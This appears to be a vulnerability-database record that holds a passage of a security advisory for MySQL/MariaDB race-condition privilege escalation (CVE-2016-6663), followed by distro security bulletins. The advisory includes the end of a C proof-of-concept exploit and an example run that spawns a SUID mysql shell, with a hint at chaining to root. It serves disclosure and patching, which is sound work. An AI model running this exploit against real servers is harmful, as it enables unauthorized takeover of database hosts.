!\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt); \nsystem(\"ls -l \" SUID_SHELL); \n \nprintf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\"); \nsystem(SUID_SHELL \" -p -i \"); \n//system(SUID_SHELL \" -p -c '/bin/bash -i -p'\"); \n \n/* close MySQL connection and exit */ \nprintf(\"\\n[+] Job done. Exiting\\n\\n\"); \nmysql_close(conn); \nreturn 0; \n \n} \n \n \n------------------[ EOF ]-------------------- \n \n \n \nExample run: \n~~~~~~~~~~~~~ \n \nattacker@xenial:~/mysql-exploit$ lsb_release -a \nNo LSB modules are available. \nDistributor ID: Ubuntu \nDescription: Ubuntu 16.04.1 LTS \nRelease: 16.04 \nCodename: xenial \n \nattacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv \nii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) \nii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries \nii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files \n \nattacker@xenial:~/mysql-exploit$ id \nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker) \n \nattacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' \n+-----------------------------------------------------------------------------------------------------------------+ \n| Grants for attacker@localhost | \n+-----------------------------------------------------------------------------------------------------------------+ \n| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | \n| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | \n+-----------------------------------------------------------------------------------------------------------------+ \n \nattacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* \nls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied \n \nattacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb \n \nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit \nmysql-privesc-race.c (ver. 1.0) \n \nCVE-2016-6663 / OCVE-2016-5616 \n \nFor testing purposes only. Do no harm. \n \nDiscovered/Coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n \n[+] Starting the exploit as: \nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker) \n \n[+] Connecting to the database `pocdb` as attacker@localhost \n \n[+] Creating exploit temp directory /tmp/mysql_privesc_exploit \n \n[+] Creating mysql tables \n \nDROP TABLE IF EXISTS exploit_table \nDROP TABLE IF EXISTS mysql_suid_shell \nCREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \nCREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \n \n[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : \n-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD \n \n[+] Entering the race loop... Hang in there... \n \n \n[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: \n \n-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD \n \n[+] Spawning the mysql SUID shell now... \nRemember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) \n \nmysql_suid_shell.MYD-4.3$ whoami \nmysql \nmysql_suid_shell.MYD-4.3$ id \nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) \nmysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* \n-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm \n-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD \n-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI \nmysql_suid_shell.MYD-4.3$ exit \nexit \n \n[+] Job done. Exiting \n \n \nreal 0m28.999s \nuser 0m0.016s \nsys 0m0.016s \n \n \n \n \nVideo PoC: \n~~~~~~~~~~~ \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nMalicious local users with DB access granted a common set of privileges \n(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary \ncode and escalate their privileges to mysql system user. This would allow them \nto gain access to all of the databases stored on the server as well as exploit \nCVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges \nto root system user (rootshell) and fully compromise the target server. \n \nThis vulnerability could for example be exploited by malicious users in a shared \nhosting environment where each user is supposed to have access to only one \ndatabase assigned to them. \nIt could also be exploited by attackers who have managed to find a vulnerability \nin a website and gained access to the target system as a low-privileged user \n(such as apache/www-data). \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nMariaDB \n< 5.5.52 \n< 10.1.18 \n< 10.0.28 \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \n \nWhen checking if your system contains the patches, note that this vulnerability \nhas been known under two CVE IDs: \n \nCVE-2016-6663 \nCVE-2016-5616 \n \nCVE-2016-6663 is the original CVE that was agreed to be used by all the \naffected vendors. \nThe issue was however mentioned in Oracle CPU mistakenly under a new CVE of \nCVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be \nupdated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. \n \n \nVIII. SOLUTION \n------------------------- \n \nMariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in \nadvance which allowed them to produce patches for this vulnerability before \ndisclosure. \n \nUpdate to security releases issued by the vendor. \n \nAs a temporary mitigation, you can disable symbolic link support in the \ndatabase server configuration with the following my.cnf config setting: \n \nsymbolic-links = 0 \n \nNevertheless, an update to a patched release is recommended. \n \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nThis advisory (CVE-2016-6663 / OCVE-2016-5616): \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \n \nExploit (mysql-privesc-race.c) source code URL: \nhttp://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c \n \nVideo PoC: \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \nAdvisory for CVE-2016-6664 / OCVE-2016-5617: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \n \nVendor updates: \n \nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL \nhttp://www.mysql.com/ \n \nhttps://mariadb.org/about/ \nhttps://mariadb.com/kb/en/mdb-5552-rn/ \nhttps://mariadb.com/kb/en/mdb-10118-rn/ \nhttps://mariadb.com/kb/en/mdb-10028-rn/ \n \nhttps://www.percona.com/software \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \n \nhttp://legalhackers.com \n \n \nXI. REVISION HISTORY \n------------------------- \n \n01.11.2016 - Advisory released \n \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139476/db-escalate.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "description": "\nThe MySQL project reports:\n\n\nCVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\n\t sub component.\nCVE-2016-5616, CVE-2016-6663: Race condition allows local users with\n\t certain permissions to gain privileges by leveraging use of my_copystat\n\t by REPAIR TABLE to repair a MyISAM table.\nCVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\n\t logging, allows local users with access to the mysql account to gain\n\t root privileges via a symlink attack on error logs and possibly other\n\t files.\nCVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\n\t component.\nCVE-2016-5626: Remote security vulnerability in 'Server: GIS' sub\n\t component.\nCVE-2016-5629: Remote security vulnerability in 'Server: Federated'\n\t sub component.\nCVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\n\t component.\n\n\n", "edition": 4, "modified": "2016-09-13T00:00:00", "published": "2016-09-13T00:00:00", "id": "22373C43-D728-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/22373c43-d728-11e6-a9a5-b499baebfeaf.html", "title": "MySQL -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3492", "CVE-2016-5507", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-8283"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: rh-mysql56-mysql (5.6.34).\n\nSecurity Fix(es):\n\n* It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662)\n\n* A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)\n\n* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-6664, CVE-2016-5617)\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2016-3492, CVE-2016-5507, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283)", "modified": "2018-06-13T01:28:25", "published": "2016-11-15T16:05:56", "id": "RHSA-2016:2749", "href": "https://access.redhat.com/errata/RHSA-2016:2749", "type": "redhat", "title": "(RHSA-2016:2749) Important: rh-mysql56-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3492", "CVE-2016-5612", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5624", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-8283"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: mysql55-mysql (5.5.52).\n\nSecurity Fix(es):\n\n* It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662)\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5617, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283)", "modified": "2018-06-13T01:28:24", "published": "2016-10-31T23:33:48", "id": "RHSA-2016:2130", "href": "https://access.redhat.com/errata/RHSA-2016:2130", "type": "redhat", "title": "(RHSA-2016:2130) Important: mysql55-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5483", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3651"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n\nSecurity Fix(es):\n\n* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\n* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:35", "published": "2017-08-01T09:58:44", "id": "RHSA-2017:2192", "href": "https://access.redhat.com/errata/RHSA-2017:2192", "type": "redhat", "title": "(RHSA-2017:2192) Moderate: mariadb security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5617", "CVE-2016-6664", "CVE-2017-10268", "CVE-2017-10286", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10384", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3636", "CVE-2017-3641", "CVE-2017-3653"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: rh-mariadb101-mariadb (10.1.29). (BZ#1463417, BZ#1517327)\n\nSecurity Fix(es):\n\n* mysql: insecure error log file handling in mysqld_safe (CPU Oct 2016) (CVE-2016-5617, CVE-2016-6664)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) (CVE-2017-3238)\n\n* mysql: Server: Charsets unspecified vulnerability (CPU Jan 2017) (CVE-2017-3243)\n\n* mysql: Server: DML unspecified vulnerability (CPU Jan 2017) (CVE-2017-3244)\n\n* mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) (CVE-2017-3257)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) (CVE-2017-3258)\n\n* mysql: unsafe chmod/chown use in init script (CPU Jan 2017) (CVE-2017-3265)\n\n* mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) (CVE-2017-3291)\n\n* mysql: Server: DML unspecified vulnerability (CPU Apr 2017) (CVE-2017-3308)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) (CVE-2017-3309)\n\n* mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) (CVE-2017-3312)\n\n* mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) (CVE-2017-3313)\n\n* mysql: Logging unspecified vulnerability (CPU Jan 2017) (CVE-2017-3317)\n\n* mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017) (CVE-2017-3318)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) (CVE-2017-3453)\n\n* mysql: Server: DML unspecified vulnerability (CPU Apr 2017) (CVE-2017-3456)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) (CVE-2017-3464)\n\n* mysql: Client programs unspecified vulnerability (CPU Jul 2017) (CVE-2017-3636)\n\n* mysql: Server: DML unspecified vulnerability (CPU Jul 2017) (CVE-2017-3641)\n\n* mysql: Server: Replication unspecified vulnerability (CPU Oct 2017) (CVE-2017-10268)\n\n* mysql: Server: InnoDB unspecified vulnerability (CPU Oct 2017) (CVE-2017-10286)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017) (CVE-2017-10378)\n\n* mysql: Client programs unspecified vulnerability (CPU Oct 2017) (CVE-2017-10379)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Oct 2017) (CVE-2017-10384)\n\n* mysql: prepared statement handle use-after-free after disconnect (CVE-2017-3302)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) (CVE-2017-3653)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, a syntax error in the Galera Arbitrator SysV init script prevented the garbd daemon from being started when the SysV init script was used. With this update, the definition of the main daemon binary in the SysV init script has been fixed, and the described problem no longer occurs. (BZ#1466473)\n\n* Prior to this update, the scl macros were not set for the rh-mariadb101-mariadb@.service file, which consequently made the service file unusable. This bug has been fixed, and rh-mariadb101-mariadb@.service now works as expected. (BZ#1485995)", "modified": "2018-06-13T01:28:22", "published": "2018-03-21T17:36:47", "id": "RHSA-2018:0574", "href": "https://access.redhat.com/errata/RHSA-2018:0574", "type": "redhat", "title": "(RHSA-2018:0574) Moderate: rh-mariadb101-mariadb and rh-mariadb101-galera security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5617", "CVE-2016-6664", "CVE-2017-10268", "CVE-2017-10286", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10384", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3636", "CVE-2017-3641", "CVE-2017-3653"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: rh-mariadb100-mariadb (10.0.33).\n\nSecurity Fix(es):\n\n* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\n* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464, CVE-2017-3636, CVE-2017-3641, CVE-2017-3653, CVE-2017-10268, CVE-2017-10286, CVE-2017-10378, CVE-2017-10379, CVE-2017-10384)", "modified": "2018-06-13T01:28:16", "published": "2018-02-06T15:37:36", "id": "RHSA-2018:0279", "href": "https://access.redhat.com/errata/RHSA-2018:0279", "type": "redhat", "title": "(RHSA-2018:0279) Moderate: rh-mariadb100-mariadb security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-02-17T05:00:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: unspecified vulnerability affecing the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "modified": "2017-02-17T04:16:24", "published": "2017-02-17T04:16:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00027.html", "id": "OPENSUSE-SU-2017:0486-1", "title": "Security update for mariadb (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T00:59:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3258"], "edition": 1, "description": "This mysql version update to 5.5.54 fixes the following issues:\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: Unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3313: Unspecified vulnerability affecting the MyISAM component\n (bsc#1020890)\n - CVE-2017-3312: Insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: Unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: Unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3244: Unspecified vulnerability affecing the DML component\n (bsc#1020877)\n - CVE-2017-3243: Unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: Unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n Release Notes:\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html\">http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-54.html</a>\n\n", "modified": "2017-02-07T00:07:36", "published": "2017-02-07T00:07:36", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00011.html", "id": "SUSE-SU-2017:0408-1", "type": "suse", "title": "Security update for mysql (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T18:59:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: unspecified vulnerability affecing the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n", "modified": "2017-02-07T18:08:59", "published": "2017-02-07T18:08:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00012.html", "id": "SUSE-SU-2017:0411-1", "type": "suse", "title": "Security update for mariadb (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T18:59:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: 